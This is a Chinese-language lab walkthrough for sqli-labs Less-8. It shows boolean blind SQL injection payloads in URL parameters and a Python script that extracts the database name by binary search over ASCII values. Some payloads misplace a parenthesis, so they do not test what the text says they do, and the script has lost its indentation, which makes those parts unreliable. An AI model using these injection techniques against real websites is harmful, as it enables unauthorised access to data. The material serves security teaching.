less-8
打开靶场。
输入id=1得到了和前面一样的回显。
通过尝试前面的闭合方式,是'))的闭合方式。
我们输入id=1')).
发现没有报错回显。
这关发现回显就2种方式,一种是有字符回显,一种是啥都没,那根据这样的回显方式我们可以使用布尔盲注的方法。
我们可以通过不断改变范围来查看页面的回显,这样我们最后就可以确定一个值,这样循环操作得到最后的结果。
比如我们可以用length函数和二分法来确定数据库的长度。
?id=1' and (select length(database())>1) and 1=1 --+
正常回显。
我们尝试输入
?id=1' and (select length(database()>8)) and 1=1 --+
显示无回显,下面我们输入
?id=1' and (select length(database()>7)) and 1=1 --+
回显正常,再和前面的作比较,我们>8是无回显,>7有回显,说明就剩8是正确的了。通过这种方法我们就确定了数据库名的长度,也可以通过可以再利用ascii函数+substr函数来修改字符串的范围,判断数据库的各个字符的ASCII的值,来转换为最后的数据库名称。
那么根据这种方法,我们可以写一个py脚本来帮助我们解决这些循环的操作。
python
import requests
url = "..."
def inject_database(url):
name = ''
for i in range(1, 100):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "1' and ascii(substr((select database()),%d,1)) > %d-- " % (i, mid)
params = {"id": payload}
r = requests.get(url, params=params)
if "You are in..........." in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print(name)
inject_database(url)

可以看到通过上面的脚本就可以轻松的通过布尔盲注的方式来解决。
查询数据库里的表与字段也可以通过写脚本的方式来执行。这里就不做阐述了。